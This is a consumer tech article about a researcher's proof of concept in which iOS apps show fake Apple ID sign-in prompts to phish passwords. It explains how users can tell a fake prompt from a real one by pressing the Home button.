Since it’s always simpler to trick users into giving their login credentials instead of hacking them, phishing scams exist since the early days of the Internet. While technology has evolved since then, so have scammers.
Today’s phishing scams can look incredibly legit and appear just at the right time. By that I mean, in those moments when you’d expect an official sign-in prompt. Remember the Google Docs scam that happened earlier this year? It looks absolutely benign, but it was certainly not.
Security researcher Felix Krause points out that iOS devices can still be targeted by phishing scams, despite all of Apple’s security measurements and thorough verifications of all the apps that are approved in the App Store.
How to spot a fake Apple ID sign-in prompt
A malicious app that managed to get published in the App Store can send a fake Apple ID sign-in prompt that looks just like the ones Apple sends. So how do we spot a fake Apple ID sign-in prompt? After all, if you make the mistake of entering your password not only you’ve been successfully phished, but you might also not be aware of it.
Felix Krause has also provided the solution. An Apple ID sign-in prompt offers two choices: you can either enter the password and hit the Sign In button or press Cancel to close the prompt.
As you can see, legit and fake Apple sign-in prompts practically look the same, so you can’t tell them apart just by looking at them. However, if you want to spot a fake Apple ID sign-in prompt tap or press the Home button. If it’s fake, the prompt and app will disappear when you tap the home button. If the prompt is legit it will remain displayed because the system dialogs are processes that run outside apps.
It’s also worth mentioning that you don’t even need to click the Sign In button on the fake prompt for the malicious app to get your password. All you need to do is to type it – even if you’ve typed just a few characters before pressing Cancel (or the home button), the app has already collected the information.
Apple is quite good at preventing malicious apps from getting published in the App Store. While the approval time for an app is not as long as it used to be, it took a long time for Apple to shorten the time frame, which likely happened when they improved their security algorithms and the approval procedure.
Nevertheless, it doesn’t mean there’s nothing Apple can do to make the approval process even more secure. Krause even provides some suggestions in this department. One of them recommends Apple asks developers to add an icon for the app that prompts you to enter your password, which a simple but reliable solution.
Please keep in mind that Krause’s demonstration is just a proof of concept. There is no knowledge that there are any App Store apps capable of sending fake Apple ID sign-in prompts and he never published his source code, for obvious security concerns.